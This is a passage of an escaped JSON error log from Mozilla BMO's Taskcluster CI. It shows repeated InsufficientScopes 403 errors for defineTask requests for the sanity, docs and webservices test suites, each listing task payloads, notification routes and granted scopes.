Tests\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-27T02:16:26.389Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-28T02:16:26.389Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DMPwKGYlRU63tistQqvPzQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-28T02:16:26.389Z\\\"\\n}\\n  time:     2016-09-27T02:16:26.735Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"ZwA1sU9fQqSli28YJqi3vQ\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"San\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"sanity\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 8,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-bteam\",\n                            \"GITHUB_BASE_SHA\": \"639a051e3aea3608efd7607b944b2c33aa17cfe5\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"mozilla-bteam\",\n                            \"GITHUB_HEAD_SHA\": \"93826b5e5289cef8b6b15ba630fe522d236e9933\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"mozilla-bteam@noreply.github.com\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Basic Sanity Tests\",\n                        \"description\": \"Basic Sanity Tests\",\n                        \"owner\": \"mozilla-bteam@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-27T02:16:26.389Z\",\n                    \"deadline\": \"2016-09-28T02:16:26.389Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"DMPwKGYlRU63tistQqvPzQ\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-28T02:16:26.389Z\"\n                },\n                \"time\": \"2016-09-27T02:16:26.735Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"IgdlLXvZT5q_yzKKpKV0mg\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Doc\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"docs\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Documentation Build Test\\\",\\n    \\\"description\\\": \\\"Documentation Build Test\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-27T02:16:26.390Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-28T02:16:26.390Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DMPwKGYlRU63tistQqvPzQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-28T02:16:26.390Z\\\"\\n}\\n  time:     2016-09-27T02:16:26.742Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"IgdlLXvZT5q_yzKKpKV0mg\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Doc\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"docs\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Documentation Build Test\\\",\\n    \\\"description\\\": \\\"Documentation Build Test\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-27T02:16:26.390Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-28T02:16:26.390Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DMPwKGYlRU63tistQqvPzQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-28T02:16:26.390Z\\\"\\n}\\n  time:     2016-09-27T02:16:26.742Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"IgdlLXvZT5q_yzKKpKV0mg\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"Doc\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"docs\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 8,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-bteam\",\n                            \"GITHUB_BASE_SHA\": \"639a051e3aea3608efd7607b944b2c33aa17cfe5\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"mozilla-bteam\",\n                            \"GITHUB_HEAD_SHA\": \"93826b5e5289cef8b6b15ba630fe522d236e9933\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"mozilla-bteam@noreply.github.com\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Documentation Build Test\",\n                        \"description\": \"Documentation Build Test\",\n                        \"owner\": \"mozilla-bteam@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-27T02:16:26.390Z\",\n                    \"deadline\": \"2016-09-28T02:16:26.390Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"DMPwKGYlRU63tistQqvPzQ\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-28T02:16:26.390Z\"\n                },\n                \"time\": \"2016-09-27T02:16:26.742Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"Tzpe9WhETzSYjeeJy_C9DQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"API\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"webservices\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      